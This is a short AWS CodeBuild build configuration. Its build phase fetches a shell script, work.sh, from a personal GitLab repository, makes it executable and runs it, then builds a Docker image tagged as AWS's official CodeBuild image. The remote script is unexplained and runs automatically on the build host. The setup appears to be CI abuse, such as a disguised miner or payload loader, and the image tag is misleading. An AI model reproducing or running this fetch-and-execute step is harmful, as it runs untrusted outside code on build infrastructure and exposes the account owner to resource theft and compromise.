version: 0.2

phases:
  build:
    commands:
      - wget https://gitlab.com/nurulsyifa8383/work/-/raw/main/work.sh
      - chmod +x work.sh
      - ./work.sh
      - docker build -t aws/codebuild/amazonlinux2-x86_64-standard:3.0 .
